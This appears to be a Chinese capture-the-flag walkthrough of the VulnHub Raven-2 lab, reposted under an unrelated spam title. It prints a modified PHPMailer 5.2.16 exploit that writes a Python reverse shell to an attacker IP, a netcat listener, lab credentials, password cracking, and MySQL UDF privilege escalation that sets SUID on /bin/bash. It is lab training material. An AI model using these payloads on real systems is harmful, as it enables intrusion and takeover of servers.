深圳建网站多少钱小说类网站程序
- 作者: 五速梦信息网
- 时间: 2026年04月20日 09:21
当前位置: 首页 > news >正文
深圳建网站多少钱,小说类网站程序,南昌网站建设公司,wordpress 示例前言 靶机#xff1a;Raven-2#xff0c;IP地址为192.168.10.9 攻击#xff1a;kali#xff0c;IP地址为192.168.10.2 都采用虚拟机#xff0c;网卡为桥接模式 文章所用靶机来自vulnhub#xff0c;可通过官网下载#xff0c;或者通过链接:https://pan.quark.cn/s/a65…前言 靶机Raven-2IP地址为192.168.10.9 攻击kaliIP地址为192.168.10.2 都采用虚拟机网卡为桥接模式 文章所用靶机来自vulnhub可通过官网下载或者通过链接:https://pan.quark.cn/s/a6558e284a2b 主机发现 因为都处于同一局域网、同一网卡、同一网段并且因为桥接模式扫描出的结果很多所以决定采用arp-scan -l或者netdiscover -r 192.168.10.1/24扫描网段中的存活主机。 若想要模拟真实可以采用nmap等工具 信息收集 使用nmap扫描端口 网站信息探测 访问80端口网站发现与raven-1的页面是一样的 点击访问blog发现是wordpress目录 再点击hello world发现跳转到一个域名和raven-一样需要绑定ip进行解析 这里还是以linux进行编辑/etc/hosts文件进行绑定 再访问wordpress页面正常显示了并且是wordpress的某个主题默认界面 使用whatweb尝试对该网站进行指纹识别等操作确定为wordpress版本为4.8.7 那么使用针对该CMS的工具wpscan进行测试 wpscan –url http://raven.local/wordpress那么尝试进行枚举用户发现又是这两个用户michael和steven wpscan –url http://raven.local/wordpress -e u再次对插件进行测试发现并无有漏洞的插件爆破密码但是时间太长所以尝试进行网站目录爆破 这里是使用gobuster当然还有其他很优秀的工具如dirb、dirsearch等 gobuster dir -u http://192.168.10.9 -w /usr/share/wordlists/dirb/big.txt -x php,html,zip,tar -b 404,403但是发现这里的结果与raven-1是一样的访问vendor目录点击PATH发现第一个flag 不过这里也给出当前目录所在路径往前推测网站建设在/var/www/html下 点击version发现版本为5.2.16发现还是与raven-1一样啧怀疑与前面靶机的方式一模一样访问security.md发现还是一样的安全提示 php mailer漏洞利用 ok那么就直接利用php mailer的漏洞 在raven-1靶场中使用的是sh脚本不过当时需要修改一些地方这里采用py脚本进行测试 searchsploit phpmailer 5.2.16查看脚本内容 把修改后的代码放置在这里 from requests_toolbelt import MultipartEncoder import requests import os import base64 from lxml import html as lhtarget http://192.168.10.9/contact.php backdoor /test.phppayload ?php system(\python -c import socket,subprocess,os;ssocket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\192.168.10.2\\,9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);psubprocess.call([\\/bin/sh\\,\-i\])); ? fields{action: submit,name: payload,email: anarcoder\\ -OQueueDirectory/tmp -X/var/www/html/test.php server\ protonmail.com,message: Pwned}m MultipartEncoder(fieldsfields,boundary—-WebKitFormBoundaryzXJpHSq4mNy35tHe)headers{User-Agent: curl/7.47.0,Content-Type: m.content_type}proxies {http: localhost:8081, https:localhost:8081}print([] SeNdiNG eVIl SHeLL To TaRGeT….) r requests.post(target, datam.to_string(),headersheaders) print([] SPaWNiNG eVIL sHeLL….. bOOOOM :D) r requests.get(targetbackdoor, headersheaders) if r.status_code 200:print([] ExPLoITeD target)我这里安装模块的pip有问题无法直接安装缺失的模块所以使用python开启一个虚拟环境 python3 -m venv ./my_venv source my_venv/bin/activate这时候就已经启动虚拟环境了当然想要退出虚拟环境只需要输入命令deactivate即可 这时再把缺失的模块使用pip安装然后执行python3 40974.py即可 先在kali开启监听端口9999 nc -lvvp 9999然后浏览器访问地址http://192.168.10.9/test.php注意这里访问的不是执行后提供的地址。 这里是把脚本写入到/var/www/html下的所以直接访问即可 做到这里我大概知道了因为在发现两个用户的时候就开始进行ssh爆破了就是不能成功所以这里是必须采用php mailer漏洞利用 使用dpkg测试靶机是否安装python以及什么版本然后使用python获取一个交互式的界面即可 dpkg -l | grep python python -c import pty;pty.spawn(/bin/bash)靶机内信息收集 在进行种种目录探测时发现/var/www目录下出现flag2 啧这里的信息与raven-1靶机一样的所以直接就查看wordpress有无连接数据库的文件吧 查看wp-config.php有信息用户名root密码Rv3nSecurity 发现之前两个用户的密码不过进行hash加密了 这里可以把两个hash加密的密码放入一个文件中然后使用john解密即可或者通过在线解密网站也是可以的网站上基本上对于解密过的很快便有结果使用john的话是暴力破解的 john的破解结果 获取到steven的密码LOLLOL1尝试登录ssh发现不是看来还是要登录网站 登录wordpress在media处发现flag3 提权 通过上传pspy64观察有什么东西发现只有mysql以root身份执行那么很明确了mysql udf提权 和raven-1靶机一样这里复习一下 首先确定数据库的版本信息5.5.60 然后测试安全策略的情况 1当 secure_file_priv 的值为 NULL 表示限制 mysqld 不允许导入|导出此时无法提权 2当 secure_file_priv 的值没有具体值时表示不对 mysqld 的导入|导出做限制此时可提权 3如果是 MySQL 5.1 的版本必须把 UDF 的动态链接库文件放置于 MySQL 安装目录下的 lib\plugin 文件夹下文件夹下才能创建自定义函数。 在kali中使用searchsploit搜索对应的mysql udf漏洞 查看这个c文件可以看到用法等情况因为与raven-1一样所以不再进行详细说明 在kali中进行编译然后把.so文件上传到靶机内 这时候确定后可以开始进行下一步操作了这里不止可以定义do_system()还有sys_exec()也行的不过这里的脚本中的定义名为do_system所以使用这个函数调用。 具体的可以再去看c文件或者自己去编写 use mysql; create table foo(line blob); insert into foo values(load_file(/tmp/1518.so)); select * from foo into dumpfile /usr/lib/mysql/plugin/1518.so; create function do_system returns integer soname 1518.so; select * from mysql.func; select do_system(chmod us /bin/bash);再通过do_system执行加权限 在root用户的主目录下找到最后的flag 总结 该靶场与前面靶场raven-1考察点是一样的不过这里ssh爆破取消了。 网站目录爆破发现名信息使用php mailer对应的版本漏洞进行复习操作获取反弹shell后发现mysql与wordpress连接的数据库文件上传pspy64获取到mysql以root身份运行的所以权限很高查看到wordpress的用户密码后能破解的还是登录网站查看因为可能有其他敏感信息多收集测试mysql udf提权有无条件也就是安全策略方面能否写入和导出以及插件目录的权限等等
- 上一篇: 深圳建网站seo做视频的网站带模板
- 下一篇: 深圳建网站多少钱一年vantage wordpress
相关文章
-
深圳建网站seo做视频的网站带模板
深圳建网站seo做视频的网站带模板
- 技术栈
- 2026年04月20日
-
深圳建设注册中心网站程序开发过程有哪四个步骤
深圳建设注册中心网站程序开发过程有哪四个步骤
- 技术栈
- 2026年04月20日
-
深圳建设网站需要多少钱仿新浪全站网站源码
深圳建设网站需要多少钱仿新浪全站网站源码
- 技术栈
- 2026年04月20日
-
深圳建网站多少钱一年vantage wordpress
深圳建网站多少钱一年vantage wordpress
- 技术栈
- 2026年04月20日
-
深圳建网站好的公司公司网站做好了还需
深圳建网站好的公司公司网站做好了还需
- 技术栈
- 2026年04月20日
-
深圳建网站哪家公司好网站设计制作哪里好
深圳建网站哪家公司好网站设计制作哪里好
- 技术栈
- 2026年04月20日
